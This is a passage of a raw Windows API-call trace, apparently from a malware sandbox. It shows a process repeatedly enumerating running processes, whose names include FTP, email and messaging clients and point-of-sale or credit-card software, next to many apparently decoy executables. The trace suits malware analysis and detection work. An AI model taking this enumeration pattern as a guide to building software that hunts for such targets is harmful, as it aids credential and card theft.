th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0266.563] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0266.564] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0266.566] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0266.568] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0266.569] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0266.571] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0266.572] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0266.579] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0266.581] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0266.583] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0266.585] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0266.587] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0266.589] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0266.592] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0266.594] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0266.596] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0266.597] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0266.599] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0266.600] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0266.602] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0266.605] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0266.607] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0266.609] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0266.611] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0266.613] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0266.622] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0266.624] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0266.626] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0266.629] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0266.631] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0266.634] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0266.636] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0266.639] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0266.641] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0266.644] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0266.647] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0266.649] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0266.652] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0266.732] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0266.734] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0266.737] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0266.739] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0266.742] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0266.744] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0266.746] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0266.748] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0266.751] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0266.753] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0266.755] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0266.758] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0266.760] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0266.863] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0266.865] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0266.866] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0266.868] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0266.870] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0266.876] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0266.878] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0266.880] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0266.882] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0266.883] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0266.885] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0266.887] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0266.892] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0266.894] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0266.896] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0266.898] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0266.900] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0266.913] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0266.915] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0266.917] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0266.923] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0266.925] CloseHandle (hObject=0x9e0) returned 1 [0266.925] Sleep (dwMilliseconds=0x64) [0267.070] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0267.115] Process32First (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.117] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0267.119] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0267.121] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0267.128] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0267.130] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0267.132] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0267.135] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0267.153] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0267.156] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, 